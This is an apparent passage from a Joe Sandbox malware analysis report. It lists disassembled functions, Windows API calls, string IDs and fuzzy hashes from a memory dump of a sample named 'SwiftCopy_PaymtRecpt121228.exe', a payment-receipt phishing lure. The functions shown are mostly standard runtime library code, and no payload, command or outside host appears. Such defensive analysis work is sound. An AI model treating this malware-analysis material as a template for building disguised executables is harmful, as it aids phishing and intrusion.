                                                    • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                    • lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$lstrcat
                                                    • String ID:
                                                    • API String ID: 493641738-0
                                                    • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                    • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                    • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                    • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                    Function 100091B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 100091D0
                                                      • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                      • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                    • _free.LIBCMT ref: 100091E2
                                                    • _free.LIBCMT ref: 100091F4
                                                    • _free.LIBCMT ref: 10009206
                                                    • _free.LIBCMT ref: 10009218
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                    • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                    • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                    • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                    Function 10005351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 1000536F
                                                      • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                      • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                    • _free.LIBCMT ref: 10005381
                                                    • _free.LIBCMT ref: 10005394
                                                    • _free.LIBCMT ref: 100053A5
                                                    • _free.LIBCMT ref: 100053B6
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                    • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                    • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                    • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                    Function 10009B0D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: *O"/
                                                    • API String ID: 0-463055101
                                                    • Opcode ID: a6e3e212e3e8e69e5b3e90cc56111543990103d41b7ff965f9c36c1ca3af5bcd
                                                    • Instruction ID: e0f187942aa90d3f3c40e731aaf8e1dc3f9218b11d74515a16622edea155382f
                                                    • Opcode Fuzzy Hash: a6e3e212e3e8e69e5b3e90cc56111543990103d41b7ff965f9c36c1ca3af5bcd
                                                    • Instruction Fuzzy Hash: C8519F75D0020AABFB11CFA4CD45FAE7BF9EF493A0F11405AF805A7299D731AA41CB61
                                                    Function 100063F0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 168COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 1000655C
                                                      • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017,100062AB,00000000,?,?,?,?,00000016,?,?,100062B8,00000000,00000000,00000000,00000000,00000000), ref: 100062BE
                                                      • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                      • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                    • String ID: *?$*O"/$.
                                                    • API String ID: 2667617558-2265361421
                                                    • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                    • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                    • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                    • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                    Function 10004BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe,00000104), ref: 10004C1D
                                                    • _free.LIBCMT ref: 10004CE8
                                                    • _free.LIBCMT ref: 10004CF2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: _free$FileModuleName
                                                    • String ID: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
                                                    • API String ID: 2506810119-3272021383
                                                    • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                    • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                    • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                    • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                    Function 100098F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,?,00000000,?,?,10009C54,?,00000000,?), ref: 100099A8
                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,10009C54,?,00000000,?,00000000,00000000,?,00000000), ref: 100099D6
                                                    • GetLastError.KERNEL32(?,10009C54,?,00000000,?,00000000,00000000,?,00000000), ref: 10009A07
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ByteCharErrorFileLastMultiWideWrite
                                                    • String ID: *O"/
                                                    • API String ID: 2456169464-463055101
                                                    • Opcode ID: 427868bedf5aeb2dbe74816aae85c58cffe3606ac2297d0d696d101185ff0d15
                                                    • Instruction ID: 4dca0cb6e5ae08cfaecef52c11f05f5c50a0db4386d341a895ff8b0f45518e07
                                                    • Opcode Fuzzy Hash: 427868bedf5aeb2dbe74816aae85c58cffe3606ac2297d0d696d101185ff0d15
                                                    • Instruction Fuzzy Hash: 7D314375A002199FEB14CF69CC95AEAB7B9EF48344F0144ADE50AD7254D730AD81CB61
                                                    Function 10005CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                    • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad$ErrorLast
                                                    • String ID:
                                                    • API String ID: 3177248105-0
                                                    • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                    • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                    • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                    • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                    Function 10006E20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                                                    • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: CodeInfoPageValid
                                                    • String ID: *O"/
                                                    • API String ID: 546120528-463055101
                                                    • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                    • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                                                    • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                    • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90
                                                    Function 10006ACB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: Info
                                                    • String ID: $*O"/
                                                    • API String ID: 1807457897-2670824738
                                                    • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                    • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                                                    • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                    • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                                                    Function 10009807 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,10009C44,?,00000000,?,00000000,00000000), ref: 100098B1
                                                    • GetLastError.KERNEL32(?,10009C44,?,00000000,?,00000000,00000000,?,00000000), ref: 100098DA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastWrite
                                                    • String ID: *O"/
                                                    • API String ID: 442123175-463055101
                                                    • Opcode ID: 44c02fc31167cef82eb2c7325f1918f2fa4c78e7bb82f98d2e24cadcd22c2269
                                                    • Instruction ID: 10ae1692938ef1c10bc5cabf9f53a2a3bd6999d6216ca289fae0ab6df1a73c16
                                                    • Opcode Fuzzy Hash: 44c02fc31167cef82eb2c7325f1918f2fa4c78e7bb82f98d2e24cadcd22c2269
                                                    • Instruction Fuzzy Hash: 94316171A002199BDB24CF59CC80AD9B3F9FF49350F2185AAE519D7360DB30E985CB50
                                                    Function 10009728 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,10009C64,?,00000000,?,00000000,00000000), ref: 100097C3
                                                    • GetLastError.KERNEL32(?,10009C64,?,00000000,?,00000000,00000000,?,00000000), ref: 100097EC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastWrite
                                                    • String ID: *O"/
                                                    • API String ID: 442123175-463055101
                                                    • Opcode ID: 2f97b0ea3d2111d9094b6cf8e2123f0946c90a3f737484b600376bf3188e4d44
                                                    • Instruction ID: 38868272ab1662a5a2ad023a6230b7ecc66e9b3593444bcc3211b27e9ed8cf09
                                                    • Opcode Fuzzy Hash: 2f97b0ea3d2111d9094b6cf8e2123f0946c90a3f737484b600376bf3188e4d44
                                                    • Instruction Fuzzy Hash: DC21B136A14219DFEB15CF59C884BDAB3F8EB48381F1044AAE94AD7251D730ED81CB20
                                                    Function 10005C45 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 10005CA5
                                                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: AddressProc__crt_fast_encode_pointer
                                                    • String ID: *O"/
                                                    • API String ID: 2279764990-463055101
                                                    • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                    • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                                                    • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                    • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1
                                                    Function 100016AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: : $Se.
                                                    • API String ID: 4218353326-4089948878
                                                    • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                    • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                    • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                    • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                    Function 10002ADA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10002B4F
                                                    • ___raise_securityfailure.LIBCMT ref: 10002C36
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                    • String ID: *O"/
                                                    • API String ID: 3761405300-463055101
                                                    • Opcode ID: 70e6b92d4ff8390b97530531c8a31b2bf75f1acffc31a4c733281a71a18183d0
                                                    • Instruction ID: 3e738cf41e4fedca429440b27c5ceba6e76d410b83429fe86edfa1b27721cda5
                                                    • Opcode Fuzzy Hash: 70e6b92d4ff8390b97530531c8a31b2bf75f1acffc31a4c733281a71a18183d0
                                                    • Instruction Fuzzy Hash: 2F21BEB8512361AAF714CF15DED1B44BBE4FB48764F10C02AE9089A3A0E7B0D581CF55
                                                    Function 10001EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                      • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                    • String ID: Unknown exception
                                                    • API String ID: 3476068407-410509341
                                                    • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                    • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                    • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                    • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                    Function 10005F19 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: String
                                                    • String ID: *O"/$LCMapStringEx
                                                    • API String ID: 2568140703-155514726
                                                    • Opcode ID: 7a47d43865ba002eab841ac63f0264426d0741ac74f7406fba362a09800a18bf
                                                    • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                                                    • Opcode Fuzzy Hash: 7a47d43865ba002eab841ac63f0264426d0741ac74f7406fba362a09800a18bf
                                                    • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95
                                                    Function 10005EB7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 10005F02
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: CountCriticalInitializeSectionSpin
                                                    • String ID: *O"/$InitializeCriticalSectionEx
                                                    • API String ID: 2593887523-1713330641
                                                    • Opcode ID: 239e2963de0d6cd0752a7905e87955d260eca2173f5729cc2670a532fb8154a9
                                                    • Instruction ID: 674605c196627833912876511d98c7499c33f247a669ee446c9f59910835c79f
                                                    • Opcode Fuzzy Hash: 239e2963de0d6cd0752a7905e87955d260eca2173f5729cc2670a532fb8154a9
                                                    • Instruction Fuzzy Hash: B0F0B43154011CBBFB159F50CC00DEE7F61DB183D1B108025FD0966164CF32AD10AAA4
                                                    Function 10005D5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: Alloc
                                                    • String ID: *O"/$FlsAlloc
                                                    • API String ID: 2773662609-2036727898
                                                    • Opcode ID: a4c1784f5932adb522d2ca488d7768f2f935f19ba84bde8ccc2372c69ff9f61f
                                                    • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                                                    • Opcode Fuzzy Hash: a4c1784f5932adb522d2ca488d7768f2f935f19ba84bde8ccc2372c69ff9f61f
                                                    • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6
                                                    Function 10005DB2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: Free
                                                    • String ID: *O"/$FlsFree
                                                    • API String ID: 3978063606-262826712
